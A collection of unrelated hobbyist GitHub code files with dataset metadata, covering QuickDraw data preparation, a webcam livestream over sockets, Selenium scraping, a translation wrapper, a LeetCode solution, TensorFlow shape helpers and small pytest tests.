dtype=np.int16)\n stroke_x_ds = data_file.create_dataset(\"stroke_x\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint8))\n stroke_y_ds = data_file.create_dataset(\"stroke_y\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint8))\n stroke_len_ds = data_file.create_dataset(\"stroke_len\", (data_size,), dtype=h5py.special_dtype(vlen=np.uint32))\n\n offset = 0\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\"drawing\": lambda drawing: eval(drawing)})\n\n key_id_ds[offset:offset + len(df)] = df.index.values\n category_ds[offset:offset + len(df)] = [categories.index(word) for word in df.word]\n stroke_x_ds[offset:offset + len(df)] = [flatten_strokes(d, 0) for d in df.drawing]\n stroke_y_ds[offset:offset + len(df)] = [flatten_strokes(d, 1) for d in df.drawing]\n stroke_len_ds[offset:offset + len(df)] = [flatten_stroke_lens(d) for d in df.drawing]\n\n offset += len(df)\n\n print(\"wrote {} data elements\".format(offset))\n\n shutil.move(\"quickdraw_train.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train.hdf5\")\n\n\ndef prepare_thumbnails():\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n with h5py.File(\"quickdraw_train_thumbnails.hdf5\", \"w\", libver=\"latest\") as data_file:\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified_shard_0/{}-0.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n usecols=[\"key_id\", \"drawing\", \"word\"],\n converters={\"drawing\": lambda drawing: draw_strokes(eval(drawing), size=32)})\n\n thumbnail = np.stack(df.drawing.values)\n\n group = data_file.create_group(category)\n group[\"thumbnail\"] = thumbnail\n group[\"category\"] = [categories.index(word) for word in df.word]\n\n shutil.move(\"quickdraw_train_thumbnails.hdf5\", \"/storage/kaggle/quickdraw/quickdraw_train_thumbnails.hdf5\")\n\n\ndef prepare_shards():\n num_shards = 50\n\n if 
os.path.isdir(\"/storage/kaggle/quickdraw/train_simplified_shards\"):\n shutil.rmtree(\"/storage/kaggle/quickdraw/train_simplified_shards\")\n os.makedirs(\"/storage/kaggle/quickdraw/train_simplified_shards\")\n\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n for category in categories:\n csv_file_name = \"/storage/kaggle/quickdraw/train_simplified/{}.csv\".format(category)\n\n print(\"processing file '{}'\".format(csv_file_name), flush=True)\n\n df = pd.read_csv(csv_file_name, index_col=\"key_id\")\n\n shard_size = math.ceil(len(df) / num_shards)\n indexes = df.index.values\n np.random.shuffle(indexes)\n\n for s in range(num_shards):\n start = s * shard_size\n end = min(start + shard_size, len(df))\n shard_df = df[df.index.isin(indexes[start:end])]\n shard_file_name = \"/storage/kaggle/quickdraw/train_simplified_shards/shard-{}.csv\".format(s)\n write_csv_header = not os.path.isfile(shard_file_name)\n with open(shard_file_name, \"a\") as shard_file:\n shard_df.to_csv(shard_file, header=write_csv_header)\n\n\ndef csv_to_npz(csv_file_name):\n print(\"reading file '{}'\".format(csv_file_name), flush=True)\n\n categories = read_lines(\"/storage/kaggle/quickdraw/categories.txt\")\n\n df = pd.read_csv(\n csv_file_name,\n index_col=\"key_id\",\n converters={\n \"word\": lambda word: categories.index(word),\n \"drawing\": lambda drawing: np.array(eval(drawing))\n })\n\n df = df.rename(columns={\"word\": \"category\"})\n\n key_id = np.array(df.index.values, dtype=np.int64)\n drawing = np.array(df.drawing.values, dtype=np.object)\n category = np.array(df.category.values, dtype=np.int16)\n recognized = np.array(df.recognized.values, dtype=np.bool)\n countrycode = np.array(df.countrycode.values, dtype=np.object)\n\n npz_file_name = csv_file_name[:-4] + \".npz\"\n print(\"writing file '{}'\".format(npz_file_name), flush=True)\n np.savez_compressed(\n npz_file_name,\n key_id=key_id,\n drawing=drawing,\n category=category,\n recognized=recognized,\n countrycode=countrycode)\n\n return None\n\n\ndef convert_csv_to_npz():\n csv_file_names = glob.glob(\"/storage/kaggle/quickdraw/train_simplified_shards/*.csv\")\n\n with Pool(5) as pool:\n pool.map(csv_to_npz, csv_file_names)\n\n\ndef draw_image(data_file_name):\n print(\"reading file '{}'\".format(data_file_name), flush=True)\n\n data = np.load(data_file_name)\n data_drawing = data[\"drawing\"]\n data_image = np.array([draw_strokes(drawing, size=128) for drawing in data_drawing], dtype=np.uint8)\n\n image_file_name = data_file_name[:-4] + \"-img128.npy\"\n print(\"writing file '{}'\".format(image_file_name), flush=True)\n np.savez(image_file_name, image=data_image)\n\ndef draw_images():\n data_file_names = glob.glob(\"/storage/kaggle/quickdraw/train_simplified_shards/shard-0.npz\")\n\n with Pool(5) as pool:\n pool.map(draw_image, data_file_names)\n\n\nif __name__ == \"__main__\":\n draw_images()\n","repo_name":"maxliaops/kaggle-quickdraw","sub_path":"prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":7438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"11881194111","text":"# These program transfer and recieve data simultaneously (client as well as server)\n# in the send function put details of yur system ip port to create socket \n\nimport socket,cv2,pickle,struct,threading # importing necessary libraries\n\ndef send():\n\n server_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n my_ip = '192.168.43.131'\n my_port = 9999\n 
socket_address = (my_ip,my_port)\n\n server_socket.bind(socket_address)\n\n server_socket.listen(5)\n print(\"System listening to form CONNECTION on : \",socket_address , \" <<<<<<< your system\")\n\n\n while True:\n client_socket,addr = server_socket.accept()\n print('CONNECTED WITH >>>>> ',addr, \" <<<<< other systems address\")\n if client_socket:\n vid = cv2.VideoCapture(0)\n \n while(vid.isOpened()):\n img,frame = vid.read()\n a = pickle.dumps(frame)\n message = struct.pack(\"Q\",len(a))+a\n client_socket.sendall(message)\n \n cv2.imshow('>>>>>>>>>>> ANUJ GUPTA <<<<<<<<<<<<',frame)\n key = cv2.waitKey(1) & 0xFF\n if key ==ord('q'):\n client_socket.close()\n\n\n#-----------------------------------------------------------------------------------------------------------------------------------------------------------\n\n\ndef recieve():\n client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n host_ip = '192.168.43.26'\n port = 9999\n client_socket.connect((host_ip,port))\n data = b\"\"\n payload_size = struct.calcsize(\"Q\")\n while True:\n while len(data) < payload_size:\n packet = client_socket.recv(4096)\n if not packet: break\n data+=packet\n packed_msg_size = data[:payload_size]\n data = data[payload_size:]\n msg_size = struct.unpack(\"Q\",packed_msg_size)[0]\n \n while len(data) < msg_size:\n data += client_socket.recv(4096)\n frame_data = data[:msg_size]\n data = data[msg_size:]\n frame = pickle.loads(frame_data)\n cv2.imshow(\">>>>>>>>>>>>> NITESH GUPTA CALL ( ( ( CONNECTED ) ) ) <<<<<<<<<<<<\",frame)\n key = cv2.waitKey(1) & 0xFF\n if key == ord('q'):\n break\n client_socket.close()\n\n# implementing multi threading for both side connection (( sending and recieving at the same time ))\n\nsend123=threading.Thread(target=send)\nrecieve123=threading.Thread(target=recieve)\n\nsend123.start()\nrecieve123.start()","repo_name":"anujgupta09/LIVE_STREAM_VIDEO_APP_CV2_ST_ARTH","sub_path":"livestream.py","file_name":"livestream.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4182618552","text":"import requests\r\nimport json\r\nimport pandas\r\nimport datetime\r\nimport selenium\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import NoSuchElementException\r\nfrom selenium.webdriver.chrome.options import Options\r\noptions = Options()\r\noptions.add_argument('--headless=new')\r\noptions.add_argument('--disable-gpu')\r\n\r\ndef fillList(lst,deslength):\r\n if(len(lst)!=deslength):\r\n lst.insert(0,\"-\")\r\n fillList(lst,deslength)\r\n else:\r\n return lst\r\n\r\n\r\n#define Player class\r\nclass Player:\r\n def __init__(self,name,ratingon3,rating247,ratingespn,ratingrivals,position,city,state,committed,team = False):\r\n try: ratingon3=int(ratingon3)\r\n except: pass\r\n try: rating247=int(rating247)\r\n except: pass\r\n try: ratingespn=int(ratingespn)\r\n except: pass\r\n try: ratingrivals=float(ratingrivals)\r\n except: pass\r\n self.name = name\r\n self.ron3 = [ratingon3]\r\n self.r247 = [rating247]\r\n self.respn = [ratingespn]\r\n self.rrivals = [ratingrivals]\r\n self.position = position\r\n self.city = city\r\n self.state = state\r\n self.committed = committed\r\n self.team = team\r\n def __str__(self):\r\n if self.committed == True:\r\n ret_format = \"{}: Ratings - On3:{}, 247:{}, ESPN:{}, Rivals:{}\\nPos: {}, City: {}, State: {}\\n{} commit\"\r\n return 
ret_format.format(self.name,self.ron3,self.r247,self.respn,self.rrivals,self.position,self.city,self.state,self.team)\r\n else:\r\n ret_format = \"{}: Ratings - On3:{}, 247:{}, ESPN:{}, Rivals:{}\\nPos: {}, City: {}, State: {}\"\r\n return ret_format.format(self.name,self.ron3,self.r247,self.respn,self.rrivals,self.position,self.city,self.state)\r\n\r\n\r\ndef webscrape(results,nameandcities,dates):\r\n #bring in webscraper, to get today's data\r\n dates+=[datetime.date.today()]\r\n printres=[]\r\n for y in range (1,21):\r\n url = 'https://www.on3.com/db/rankings/industry-comparison/football/2024/?page='+str(y)\r\n browser = webdriver.Chrome(options=options)\r\n browser.get(url)\r\n for x in range (0,50):\r\n try:\r\n xpath_name = '/html/body/div[1]/div[1]/section/main/section/section/ul/li[' + str(1+x) + ']/div[1]/div[1]/div/a'\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_espn = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[1]/div[2]/div/span[2]/span\"\r\n xpath_pos = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[1]/span[1]\"\r\n xpath_city = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[2]/span[2]\"\r\n xpath_state = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\"+ str(1+x) +\"]/div[1]/div[1]/p[2]/span[2]\"\r\n xpath_committed = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[3]/div/a\"\r\n name = browser.find_element(\"xpath\", xpath_name).text\r\n try:\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[1]/div[2]/div/span[2]/span\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/a/div[3]/h6[1]\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except:\r\n try:\r\n xpath_on3 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[1]/div/div[3]/h6[1]\"\r\n ron3 = browser.find_element(\"xpath\", xpath_on3).text\r\n except: \r\n ron3 = \"-\"\r\n if ron3 != \"-\":\r\n ron3 = int(ron3)\r\n try:\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[1]/div[2]/div/span[2]/span\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/a/div[3]/h6[1]\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except:\r\n try:\r\n xpath_247 = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[2]/div/div[3]/h6[1]\"\r\n r247 = browser.find_element(\"xpath\", xpath_247).text\r\n except: \r\n r247 = \"-\"\r\n if r247 != \"-\":\r\n r247 = 
int(r247)\r\n try:\r\n respn = browser.find_element(\"xpath\", xpath_espn).text\r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/div/div[1]/div[2]/div/span[2]/span\"\r\n respn = browser.find_element(\"xpath\", xpath_espn).text \r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/a/div[3]/h6[1]\"\r\n respn = browser.find_element(\"xpath\", xpath_espn).text \r\n except:\r\n try:\r\n xpath_espn = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[3]/div/div[3]/h6[1]\"\r\n respn = browser.find_element(\"xpath\",xpath_espn).text\r\n except: \r\n respn = \"-\"\r\n if respn != \"-\":\r\n respn = int(respn)\r\n try:\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[1]/div[2]/div/span[2]/span\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/a/div[3]/h6[1]\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except:\r\n try:\r\n xpath_rivals = \"/html/body/div[1]/div[1]/section/main/section/section/ul/li[\" + str(1+x) + \"]/div[2]/div[4]/div/div[3]/h6[1]\"\r\n rrivals = browser.find_element(\"xpath\", xpath_rivals).text\r\n except: \r\n rrivals = \"-\"\r\n if rrivals != \"-\":\r\n rrivals = float(rrivals)\r\n pos = browser.find_element(\"xpath\", xpath_pos).text\r\n city_state = browser.find_element(\"xpath\", xpath_city).text\r\n try:\r\n committed = browser.find_element(\"xpath\",xpath_committed).text\r\n if committed[:11] == \"HARD COMMIT\":\r\n committed = True\r\n team = browser.find_element(\"xpath\",xpath_committed).get_attribute('href')\r\n team = \" \".join(str(team).split(\"/\")[4].split(\"-\")).title()\r\n else:\r\n committed = False\r\n team = False\r\n except:\r\n committed = False\r\n team = False\r\n addPlayer(name,ron3,r247,respn,rrivals,pos,city_state[:-4],city_state[-2:],committed,team,results,nameandcities)\r\n p1 = Player(name,ron3,r247,respn,rrivals,pos,city_state[:-4],city_state[-2:],committed,team)\r\n printres+=[p1]\r\n file = open(dtFormat(datetime.date.today())+\"_RecruitData_Cl24.txt\",\"w\")\r\n file.write(\"Name\\tOn3 Rating\\t247 Rating\\tESPN Rating\\tRivals Rating\\tPosition\\tCity\\tState\\tCommit Status\\tCommit Team\\n\")\r\n for printr in printres:\r\n file.write(printr.name+\"\\t\"+str(printr.ron3)+\"\\t\"+str(printr.r247)+\"\\t\"+str(printr.respn)+\"\\t\"+str(printr.rrivals)+\"\\t\"+printr.position+\"\\t\"+printr.city+\"\\t\"+printr.state+\"\\t\"+str(printr.committed)+\"\\t\"+str(printr.team)+\"\\t\"+\"\\n\")\r\n except:\r\n print(\"Nothing at player #\",x+y*50-49)\r\n pass\r\n browser.close()\r\n #outwrite this webscraper data into a new file\r\n\r\ndef dtFormat(date):\r\n stri=str(date.year)+\"-\"+str(date.month)+\"-\"+str(date.day)\r\n return stri \r\n\r\ndef addPlayer(name,ron3,r247,respn,rrivals,pos,city,state,committed,team,results,nameandcities):\r\n if ron3!=\"-\": ron3 = int(ron3)\r\n if r247!=\"-\": r247 = int(r247)\r\n if respn!=\"-\": respn = int(respn)\r\n if rrivals!=\"-\": rrivals = float(rrivals)\r\n player = Player(name,ron3,r247,respn,rrivals,pos,city,state,committed,team)\r\n if (name,city) in nameandcities:\r\n 
results[nameandcities.index((name,city))].ron3+=[ron3]\r\n results[nameandcities.index((name,city))].r247+=[r247]\r\n results[nameandcities.index((name,city))].respn+=[respn]\r\n results[nameandcities.index((name,city))].rrivals+=[rrivals]\r\n else:\r\n nameandcities+=[(name,city)]\r\n results+=[player]\r\n\r\n#first, bring in all previous results\r\n\r\nresults = []\r\nnameandcities = []\r\nstartdate = datetime.date(2023,6,7)\r\ndates=[]\r\nx=0\r\nwhile (startdate+datetime.timedelta(days=x) List[str]:\n src_shards = self._batch(sentences, self.opt.batch_size)\n\n results = []\n for i, src_shard in enumerate(src_shards):\n self.logger.info(\"Translating shard %d.\" % i)\n src_encoded_shard = self.spp.encode(src_shard, out_type=str)\n scores, encoded_sentences = self.translator.translate(src=src_encoded_shard, batch_size=self.opt.batch_size, batch_type=self.opt.batch_type)\n results.extend([self.spp.decode(sent_list[0].split(' ')) for sent_list in encoded_sentences])\n \n return results\n\n\ndef get_translator(model_path: str, sp_model_path: str, batch_size: int = 1) -> TranslatorWrapper:\n parser = _get_parser()\n\n # the '-src' flag is required but we won't be using it\n opt = parser.parse_args([\n '--model', model_path,\n '--src', '',\n '--batch_size', f'{batch_size}',\n '--batch_type', 'sents',\n '--gpu', '0' if torch.cuda.is_available() else '-1'])\n\n return TranslatorWrapper(opt, sp_model_path)\n","repo_name":"attilanagy234/TreeSwap","sub_path":"src/hu_nmt/data_augmentator/translate/translate.py","file_name":"translate.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"30386110242","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n \n# def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n# p1 = l1\n# p2 = l2\n# carry = 0\n \n# while p1 or carry:\n \n# s = p1.val + (0 if p2 is None else p2.val) + carry\n \n# p1.val = s%10\n# carry = s//10\n \n# if (p1.next is None):\n \n# if p2 is None: #### L1 was longer & we are at the last node of L1\n# if carry > 0:\n# p1.next = ListNode(carry)\n# break\n# elif p2 is not None and p2.next is None: #### L1 & L2 are equal in length & we are at the last Node\n# if carry > 0:\n# p1.next = ListNode(carry)\n# break\n# else: #### L2 was longer & we are at the last node of L1\n# #### (p1.next is None) and (p2 is not None) and (p2.next is not None):\n# p1.next = p2.next\n# p2.next = None\n \n# p1 = p1.next\n# p2 = None if p2 is None else p2.next\n \n# return l1\n \n \n \n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n #### Similar to merge method in merge sort\n \n p1 = l1\n p2 = l2\n carry = 0\n #### Add the values of first two elements\n s = p1.val + p2.val\n p1.val = s%10\n carry = s//10\n \n #### Keep adding values of next nodes until next exists for both\n while p1.next and p2.next:\n s = p1.next.val + p2.next.val + carry\n \n p1.next.val = s%10\n carry = s//10\n \n p1 = p1.next\n p2 = p2.next\n \n #### After above loop, we will have added the first x digits where x = min(m, n)\n #### We will now add the rest to the carry or leave them as is\n \n #### If p1 was longer, we will ocntinue the loop & add carry to each element of p1\n #### If p2 was longer, we will move them to p1 & do the same as above \n \n if p2.next:\n p1.next = p2.next\n\n while 
p1.next and carry > 0:\n s = p1.next.val + carry\n \n p1.next.val = s%10\n carry = s//10\n \n p1 = p1.next\n \n \n if carry > 0:\n p1.next = ListNode(carry)\n \n return l1\n \n############# Time Complexity: O(max(m, n)) #############\n## 1. Traverse each list parallelly --> O(max(m, n))\n\n############# Space Complexity: O(1) #############\n## 1. No Extra Space\n \n ","repo_name":"krishnasaiv/My-LeetCode-Journey","sub_path":"2-add-two-numbers/2-add-two-numbers.py","file_name":"2-add-two-numbers.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43313378677","text":"from selenium import webdriver\nfrom selenium.webdriver import ActionChains\ndriver=webdriver.Chrome(\"C:\\\\Users\\\\lts\\\\PycharmProjects\\\\Automation\\\\Drivers\\\\chromedriver.exe\")\n\ndriver.get(\"http://www.amazon.in\")\ndriver.maximize_window()\ndriver.implicitly_wait(10)\n\nelement=driver.find_element_by_xpath(\"//a[@id='nav-link-accountList']\")\nhover = ActionChains(driver).move_to_element(element)\nhover.perform()\ndriver.implicitly_wait(20)\n\n","repo_name":"Syedauzma-2/Automation","sub_path":"Python/mouse_HOver.py","file_name":"mouse_HOver.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32088429","text":"\n# coding: utf-8\n\n# In[88]:\n\n\nimport httplib2\nimport requests\nimport lxml.html\nimport random\nfrom PIL import Image\n\ndef downld_img(url, path):\n h = httplib2.Http('.cache')\n response, content = h.request(url)\n out = open(path+'.webp', 'wb')\n out.write(content)\n out.close()\n im = Image.open(path+\".webp\").convert(\"RGB\")\n im.save(path+\".jpg\",\"jpeg\")\n\ndef rnd_img_parsed(query):\n url = 'https://yandex.ru/images/search?text='+str(query)\n r = requests.get(url)\n html = lxml.html.fromstring(r.text)\n img = html.xpath(\"//img/@src\")\n return 'http://'+random.choice(img[1:])[2:]\n\ndef comp(query, path = 'photos/'):\n x = rnd_img_parsed(query)\n name = path+str(random.randint(10*10,(10**10)*9))\n downld_img(x, name)\n \n return name, True\n\n","repo_name":"Punctuality/CryptoKitty","sub_path":"rnd_img_taker.py","file_name":"rnd_img_taker.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"31078502853","text":"# -*- coding: utf-8 -*-\r\n\"\"\"----------------------------------------------------------\r\n Author: alexey.sychov@gameloft.com\r\n Created: 19-06-2018\r\n Description:\r\n----------------------------------------------------------\"\"\"\r\n\r\nimport pygame\r\n\r\nfrom source.misc._enums import *\r\n\r\n# ----------------------------- Chars manager ------------------------- #\r\n\r\n\r\nclass CharsManager(object):\r\n \"\"\"Agregation class for chars.\r\n \"\"\"\r\n def __init__(self, player):\r\n \"\"\"Init. 
Please, use only one instance of this class.\r\n \"\"\"\r\n self._chars = {player}\r\n\r\n\r\n def add_char(self, char):\r\n \"\"\"Add character to list for further managing.\r\n\r\n char: Char class character.\r\n \"\"\"\r\n if char not in self._chars:\r\n self._chars.append(char)\r\n\r\n\r\n def handle_event(self, event):\r\n \"\"\"Handle event.\r\n If event is handled, return True, else False.\r\n\r\n event: pygame.event.Event instance\r\n \"\"\"\r\n if event.type == pygame.USEREVENT:\r\n\r\n if event.custom_type == EVENT_DETECT_CHARS_ABSENCE_ON_CELL:\r\n for char in self._chars:\r\n result = char.rect.colliderect(event.cell_rect)\r\n if result and event.callback_yes:\r\n event.callback_yes()\r\n elif not result and event.callback_no:\r\n event.callback_no()\r\n return True\r\n\r\n return False\r\n\r\n\r\n def __repr__(self):\r\n \"\"\"Simple representation.\r\n \"\"\"\r\n return 'Chars manager.'\r\n","repo_name":"sychov/space-station","sub_path":"source/chars/chars_manager.py","file_name":"chars_manager.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16828284210","text":"import tensorflow as tf\n\n# pylint: disable=bad-indentation, protected-access\n\n \ndef infer_shape(x):\n \"\"\"\n Infers the shape of a tensor for use in reshaping\n \"\"\"\n x = tf.convert_to_tensor(x)\n\n # If unknown rank, return dynamic shape\n if x.shape.dims is None:\n return tf.shape(x)\n\n static_shape = x.shape.as_list()\n dynamic_shape = tf.shape(x)\n\n ret = []\n for i in range(len(static_shape)):\n dim = static_shape[i]\n if dim is None:\n dim = dynamic_shape[i]\n ret.append(dim)\n\n return ret\n\ndef merge_first_two_dims(tensor):\n shape = infer_shape(tensor)\n shape[0] *= shape[1]\n shape.pop(1)\n return tf.reshape(tensor, shape)\n\n\ndef split_first_two_dims(tensor, dim_0, dim_1):\n shape = infer_shape(tensor)\n new_shape = [dim_0] + [dim_1] + shape[1:]\n return tf.reshape(tensor, new_shape)\n\ndef match_tensor_shape(shape, tensor, final_rank):\n \"\"\"\n \"\"\"\n rt = len(infer_shape(tensor))\n if rt == final_rank:\n return tensor\n dims_to_add = final_rank - rt\n for _ in range(dims_to_add):\n tensor = tf.expand_dims(tensor, axis=0)\n tensor = tf.tile(tensor, shape[:dims_to_add] + [1]*rt)\n \n return tensor\n ","repo_name":"dhernandd/neurolib","sub_path":"neurolib/utils/shapes.py","file_name":"shapes.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"41689759298","text":"from .command import Command\n\nfrom src.util.selenium_util import get_element\nfrom src.util.logger import get_logger\n\nlogger = get_logger(__name__)\n\n\nclass TypeCommand(Command):\n def execute(self):\n logger.info(\"type : %s\", self.value)\n element = get_element(self.web_driver, self.target)\n if None != element:\n try:\n element.clear()\n element.send_keys(self.value)\n except Exception as ex:\n logger.error(\"%s\", ex)\n return False\n\n return True\n","repo_name":"changsin/webtester","sub_path":"src/commands/type_command.py","file_name":"type_command.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40624936124","text":"import argparse\n\nimport pytest\n\nfrom src import main as main\n\nPRICE_CATALOG_FILE_PATH = \"/some_path/some_price.csv\"\nMAPPINGS_FILE_PATH = 
\"/some_path/some_mapping.csv\"\nFINAL_CATALOG_FILE_PATH = \"/some_path/output.json\"\n\n\n@pytest.fixture\ndef command_line_arguments():\n return argparse.Namespace(price_catalog=PRICE_CATALOG_FILE_PATH,\n mappings=MAPPINGS_FILE_PATH,\n output=FINAL_CATALOG_FILE_PATH\n )\n\n\n@pytest.fixture\ndef command_line_arguments_for_argless():\n return argparse.Namespace(price_catalog=\"../tests/test_data/pricat.csv\",\n mappings=\"../tests/test_data/mappings.csv\",\n output=\"final_catalog.json\"\n )\n\n\ndef test_parse_args(command_line_arguments):\n assert main._parse_args([\"main.py\",\n \"-p\", PRICE_CATALOG_FILE_PATH,\n \"-m\", MAPPINGS_FILE_PATH,\n \"-o\", FINAL_CATALOG_FILE_PATH]\n ) == command_line_arguments\n\n\ndef test_parse_args_without_args(command_line_arguments_for_argless):\n assert main._parse_args([\"main.py\"]) == command_line_arguments_for_argless\n\n\ndef test_main(mocker):\n read_price_mocker = mocker.patch(\"file.read_price_catalog\", return_value=\"some_variations\")\n read_map_mocker = mocker.patch(\"file.read_mapping\", return_value=(\"some_mappings\", \"some_reduce_rules\"))\n\n mapper_mock = mocker.patch(\"mapper.reduce_and_map\", return_value=\"some_mapped\")\n group_mock = mocker.patch(\"grouper.group_variations_to_articles\", return_value=\"some_Articles\")\n level_var_mock = mocker.patch(\"grouper.level_up_variations_attributes\", return_value=\"some_catalog\")\n level_article_mock = mocker.patch(\"grouper.level_up_articles_attributes\", return_value=\"some_catalog2\")\n write_final_mock = mocker.patch(\"file.write_final_catalog\", return_value=\"some_catalog\")\n\n main.main(PRICE_CATALOG_FILE_PATH, MAPPINGS_FILE_PATH, FINAL_CATALOG_FILE_PATH)\n\n read_price_mocker.assert_called_with(PRICE_CATALOG_FILE_PATH)\n read_map_mocker.assert_called_with(MAPPINGS_FILE_PATH)\n\n mapper_mock.assert_called_with(\"some_mappings\", \"some_reduce_rules\", \"some_variations\")\n group_mock.assert_called_with(\"some_mapped\")\n level_var_mock.assert_called_with(\"some_Articles\")\n level_article_mock.assert_called_with(\"some_catalog\")\n\n write_final_mock.assert_called_with(FINAL_CATALOG_FILE_PATH, \"some_catalog2\")\n","repo_name":"akaldemir/fashion-cloud-assignment","sub_path":"code/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"6101123867","text":"import math\ndef solution(progresses, speeds):\n day=[]\n answer=[]\n cnt=1\n for i in range(len(progresses)):\n day.append(math.ceil((100-int(progresses[i]))/int(speeds[i])))\n max=day[0]\n for i in range(1,len(day)):\n if day[i]<=max:\n cnt+=1\n elif day[i]>max:\n answer.append(cnt)\n max=day[i]\n cnt=1\n answer.append(cnt)\n return answer","repo_name":"yujeonghyeop/progrramers","sub_path":"Level2/Level2.functiondevelop/functiondevelop.py","file_name":"functiondevelop.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39568374129","text":"import pytest\nfrom src.poweredup.protocol import VersionNumberEncoding\n\n\n@pytest.mark.parametrize('major, minor, patch, build, expected_outcome', [\n (1, 1, 1, 1, \"11010001\"),\n (2, 3, 1, 423, \"23010423\")\n])\ndef test_encoding(major: int, minor: int, patch: int, build: int, expected_outcome: str):\n version = VersionNumberEncoding(major, minor, 